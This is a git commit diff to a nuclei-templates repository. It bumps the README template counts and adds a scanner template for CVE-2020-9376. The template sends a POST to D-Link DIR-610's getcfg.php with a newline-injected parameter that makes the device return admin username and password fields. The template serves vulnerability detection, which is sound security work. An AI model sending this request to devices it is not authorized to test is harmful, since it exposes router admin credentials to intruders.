commit
ae81785b2d
|
@ -28,7 +28,7 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
|
|
||||||
| Templates | Counts | Templates | Counts |
|
| Templates | Counts | Templates | Counts |
|
||||||
| --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
| --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
||||||
| cves | 154 | default-logins | 8 |
|
| cves | 155 | default-logins | 8 |
|
||||||
| dns | 6 | exposed-panels | 72 |
|
| dns | 6 | exposed-panels | 72 |
|
||||||
| exposed-tokens | 9 | exposures | 40 |
|
| exposed-tokens | 9 | exposures | 40 |
|
||||||
| fuzzing | 5 | helpers | 3 |
|
| fuzzing | 5 | helpers | 3 |
|
||||||
|
@ -205,6 +205,7 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
│ ├── CVE-2020-8982.yaml
|
│ ├── CVE-2020-8982.yaml
|
||||||
│ ├── CVE-2020-9047.yaml
|
│ ├── CVE-2020-9047.yaml
|
||||||
│ ├── CVE-2020-9344.yaml
|
│ ├── CVE-2020-9344.yaml
|
||||||
|
│ ├── CVE-2020-9376.yaml
|
||||||
│ ├── CVE-2020-9484.yaml
|
│ ├── CVE-2020-9484.yaml
|
||||||
│ ├── CVE-2020-9496.yaml
|
│ ├── CVE-2020-9496.yaml
|
||||||
│ └── CVE-2020-9757.yaml
|
│ └── CVE-2020-9757.yaml
|
||||||
|
@ -575,7 +576,7 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
**53 directories, 475 files**.
|
**53 directories, 476 files**.
|
||||||
|
|
||||||
📖 Documentation
|
📖 Documentation
|
||||||
-----
|
-----
|
||||||
|
|
|
@ -0,0 +1,35 @@
|
||||||
|
id: CVE-2020-9376
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: D-Link Information Disclosure via getcfg.php
|
||||||
|
author: whynotke
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
|
||||||
|
NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
|
||||||
|
|
||||||
|
References:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-9376
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/getcfg.php"
|
||||||
|
|
||||||
|
body: SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
|
||||||
|
headers:
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<name>Admin</name>"
|
||||||
|
- "</usrid>"
|
||||||
|
- "</password>"
|
||||||
|
condition: and
|
||||||
|
part: body
|
Loading…
Reference in New Issue